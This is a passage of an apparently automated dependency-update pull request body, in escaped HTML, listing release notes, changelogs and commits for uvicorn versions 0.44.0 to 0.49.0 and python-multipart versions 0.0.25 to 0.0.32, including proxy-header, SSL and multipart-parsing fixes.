href=\"https://redirect.github.com/Kludex/uvicorn/pull/2940\"\u003eKludex/uvicorn#2940\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIgnore duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2944\"\u003eKludex/uvicorn#2944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.47.0...0.48.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.47.0...0.48.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.47.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEagerly import the ASGI app in the parent process by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2919\"\u003eKludex/uvicorn#2919\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003essl_context_factory\u003c/code\u003e for custom \u003ccode\u003eSSLContext\u003c/code\u003e configuration by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2920\"\u003eKludex/uvicorn#2920\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTreat \u003ccode\u003efd=0\u003c/code\u003e as a valid file descriptor with reload/workers by \u003ca href=\"https://github.com/eltoder\"\u003e\u003ccode\u003e@​eltoder\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2927\"\u003eKludex/uvicorn#2927\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.46.0...0.47.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.46.0...0.47.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.46.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_max_size\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2915\"\u003eKludex/uvicorn#2915\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_ping_interval\u003c/code\u003e and \u003ccode\u003ews_ping_timeout\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2916\"\u003eKludex/uvicorn#2916\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003ebytearray\u003c/code\u003e for incoming WebSocket message buffer in websockets-sansio by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2917\"\u003eKludex/uvicorn#2917\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.45.0...0.46.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.45.0...0.46.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.45.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePreserve forwarded client ports in proxy headers middleware by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2903\"\u003eKludex/uvicorn#2903\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003eos.PathLike\u003c/code\u003e for \u003ccode\u003elog_config\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2905\"\u003eKludex/uvicorn#2905\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003elog_level\u003c/code\u003e strings case-insensitively by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2907\"\u003eKludex/uvicorn#2907\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRaise helpful \u003ccode\u003eImportError\u003c/code\u003e when PyYAML is missing for YAML log config by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2906\"\u003eKludex/uvicorn#2906\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert empty context for ASGI runs by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2911\"\u003eKludex/uvicorn#2911\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e--reset-contextvars\u003c/code\u003e flag to isolate ASGI request context by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2912\"\u003eKludex/uvicorn#2912\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u0026quot;Emit \u003ccode\u003ehttp.disconnect\u003c/code\u003e on server shutdown for streaming responses\u0026quot; (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2829\"\u003e#2829\u003c/a\u003e) by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2913\"\u003eKludex/uvicorn#2913\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Krishnachaitanyakc\"\u003e\u003ccode\u003e@​Krishnachaitanyakc\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2870\"\u003eKludex/uvicorn#2870\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.44.0...0.45.0\"\u003ehttps://github.com/Kludex/uvicorn/compare/0.44.0...0.45.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.44.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement websocket keepalive pings for websockets-sansio by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/uvicorn/pull/2888\"\u003eKludex/uvicorn#2888\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/uvicorn/blob/main/docs/release-notes.md\"\u003euvicorn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.49.0 (June 3, 2026)\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump \u003ccode\u003ehttptools\u003c/code\u003e minimum version to 0.8.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2962\"\u003e#2962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eConsume duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e (reverses the 0.48.0 behavior of ignoring them) (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2971\"\u003e#2971\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.48.0 (May 24, 2026)\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDefault \u003ccode\u003essl_ciphers\u003c/code\u003e to \u003ccode\u003eNone\u003c/code\u003e and use OpenSSL defaults (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2940\"\u003e#2940\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eIgnore duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2944\"\u003e#2944\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.47.0 (May 14, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003essl_context_factory\u003c/code\u003e for custom \u003ccode\u003eSSLContext\u003c/code\u003e configuration (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2920\"\u003e#2920\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eEagerly import the ASGI app in the parent process (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2919\"\u003e#2919\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTreat \u003ccode\u003efd=0\u003c/code\u003e as a valid file descriptor with reload/workers (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2927\"\u003e#2927\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.46.0 (April 23, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_max_size\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2915\"\u003e#2915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_ping_interval\u003c/code\u003e and \u003ccode\u003ews_ping_timeout\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2916\"\u003e#2916\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUse \u003ccode\u003ebytearray\u003c/code\u003e for incoming WebSocket message buffer in \u003ccode\u003ewebsockets-sansio\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2917\"\u003e#2917\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.45.0 (April 21, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003e--reset-contextvars\u003c/code\u003e flag to isolate ASGI request context (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2912\"\u003e#2912\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003eos.PathLike\u003c/code\u003e for \u003ccode\u003elog_config\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2905\"\u003e#2905\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAccept \u003ccode\u003elog_level\u003c/code\u003e strings case-insensitively (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2907\"\u003e#2907\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/3ef2e3e08e3d9ad9572800f8bc54f3eaed9eab0a\"\u003e\u003ccode\u003e3ef2e3e\u003c/code\u003e\u003c/a\u003e Version 0.49.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2973\"\u003e#2973\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/eeb64b1d1c95a14096ed3313377c74b485f558fc\"\u003e\u003ccode\u003eeeb64b1\u003c/code\u003e\u003c/a\u003e Consume duplicate forwarding headers in ProxyHeadersMiddleware (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2971\"\u003e#2971\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/630f4aca14e79183617c71be714030842a1041c5\"\u003e\u003ccode\u003e630f4ac\u003c/code\u003e\u003c/a\u003e Make the watchfiles reload tests deterministic (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2972\"\u003e#2972\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/9154922e3730f7aba68ecc3ecbf536680ee8fd1c\"\u003e\u003ccode\u003e9154922\u003c/code\u003e\u003c/a\u003e chore(deps): bump the github-actions group across 1 directory with 6 updates ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/739727a1d80e468d1e47e98bbd824ee9e3c9554b\"\u003e\u003ccode\u003e739727a\u003c/code\u003e\u003c/a\u003e Migrate docs deploy from Cloudflare Pages to Workers (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2967\"\u003e#2967\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/be4a240488d3fb678a11b8e8f83505266f5f1de7\"\u003e\u003ccode\u003ebe4a240\u003c/code\u003e\u003c/a\u003e Gate docs preview deploy on Cloudflare token presence (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2966\"\u003e#2966\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/c489d7e10dfe653a2bba914feedf2a632a026e6f\"\u003e\u003ccode\u003ec489d7e\u003c/code\u003e\u003c/a\u003e Bump httptools minimum version to 0.8.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2962\"\u003e#2962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/9f547bd82ef52bcba206e04170b359bd6daa25b3\"\u003e\u003ccode\u003e9f547bd\u003c/code\u003e\u003c/a\u003e Skip docs preview deploy for Dependabot PRs (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2961\"\u003e#2961\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/44446b894e37ca76830d6aa83df4349795400ed4\"\u003e\u003ccode\u003e44446b8\u003c/code\u003e\u003c/a\u003e Migrate documentation from MkDocs Material to Zensical (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2959\"\u003e#2959\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/cfd659c4f18b526adce9c255c96707bab20af40c\"\u003e\u003ccode\u003ecfd659c\u003c/code\u003e\u003c/a\u003e Bump pymdown-extensions to 10.21.3 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2958\"\u003e#2958\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.32.1...0.49.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `python-multipart` from 0.0.20 to 0.0.32\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/python-multipart/releases\"\u003epython-multipart's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 0.0.32\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReplace per-byte partial-boundary scan with rfind lookbehind by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/300\"\u003eKludex/python-multipart#300\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.31...0.0.32\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.31...0.0.32\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.31\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up multipart header parsing and callback dispatch by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/295\"\u003eKludex/python-multipart#295\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBound header field name size before validating by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/296\"\u003eKludex/python-multipart#296\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eValidate Content-Length is non-negative in parse_form by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/297\"\u003eKludex/python-multipart#297\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.30...0.0.31\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.30...0.0.31\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.30\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eTreat only \u003ccode\u003e\u0026amp;\u003c/code\u003e as the urlencoded field separator by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/290\"\u003eKludex/python-multipart#290\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIgnore RFC 2231 extended parameters in \u003ccode\u003eparse_options_header\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/291\"\u003eKludex/python-multipart#291\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.29...0.0.30\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.29...0.0.30\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.29\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed RFC 2231 continuations in \u003ccode\u003eparse_options_header\u003c/code\u003e by \u003ca href=\"https://github.com/manunio\"\u003e\u003ccode\u003e@​manunio\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/270\"\u003eKludex/python-multipart#270\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.28...0.0.29\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.28...0.0.29\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.28\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up partial-boundary tail scan via \u003ccode\u003ebytes.find\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/281\"\u003eKludex/python-multipart#281\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCap multipart boundary length at 256 bytes by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/282\"\u003eKludex/python-multipart#282\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.27...0.0.28\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.27...0.0.28\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.27\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePass parse offsets via constructors by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/268\"\u003eKludex/python-multipart#268\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd multipart header limits by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/267\"\u003eKludex/python-multipart#267\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.26...0.0.27\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.26...0.0.27\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.26\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSkip preamble before first multipart boundary by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/262\"\u003eKludex/python-multipart#262\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSilently discard epilogue data after the closing boundary by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/259\"\u003eKludex/python-multipart#259\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/python-multipart/blob/main/CHANGELOG.md\"\u003epython-multipart's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.0.32 (2026-06-04)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up partial-boundary scanning for CR/LF-dense part data \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/300\"\u003e#300\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.31 (2026-06-04)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up multipart header parsing and callback dispatch \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/295\"\u003e#295\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eBound header field name size before validating \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/296\"\u003e#296\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eValidate \u003ccode\u003eContent-Length\u003c/code\u003e is non-negative in \u003ccode\u003eparse_form\u003c/code\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/297\"\u003e#297\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.30 (2026-05-31)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eParse \u003ccode\u003eapplication/x-www-form-urlencoded\u003c/code\u003e bodies per the WHATWG URL standard, treating only \u003ccode\u003e\u0026amp;\u003c/code\u003e as a field separator \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/290\"\u003e#290\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eIgnore RFC 2231/5987 extended parameters (\u003ccode\u003ename*\u003c/code\u003e, \u003ccode\u003efilename*\u003c/code\u003e) in \u003ccode\u003eparse_options_header\u003c/code\u003e, keeping the plain parameter authoritative per \u003ca href=\"https://datatracker.ietf.org/doc/html/rfc7578#section-4.2\"\u003eRFC 7578 §4.2\u003c/a\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/291\"\u003e#291\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.29 (2026-05-17)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed RFC 2231 continuations in \u003ccode\u003eparse_options_header\u003c/code\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/270\"\u003e#270\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.28 (2026-05-10)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up partial-boundary tail scan via \u003ccode\u003ebytes.find\u003c/code\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/281\"\u003e#281\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCap multipart boundary length at 256 bytes \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/282\"\u003e#282\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.27 (2026-04-27)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd multipart header limits \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/267\"\u003e#267\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003ePass parse offsets via constructors \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/268\"\u003e#268\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.26 (2026-04-10)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSkip preamble before the first multipart boundary more efficiently \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/262\"\u003e#262\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eSilently discard epilogue data after the closing multipart boundary \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/259\"\u003e#259\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.25 (2026-04-10)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd MIME content type info to \u003ccode\u003eFile\u003c/code\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/143\"\u003e#143\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eHandle CTE values case-insensitively \u003ca 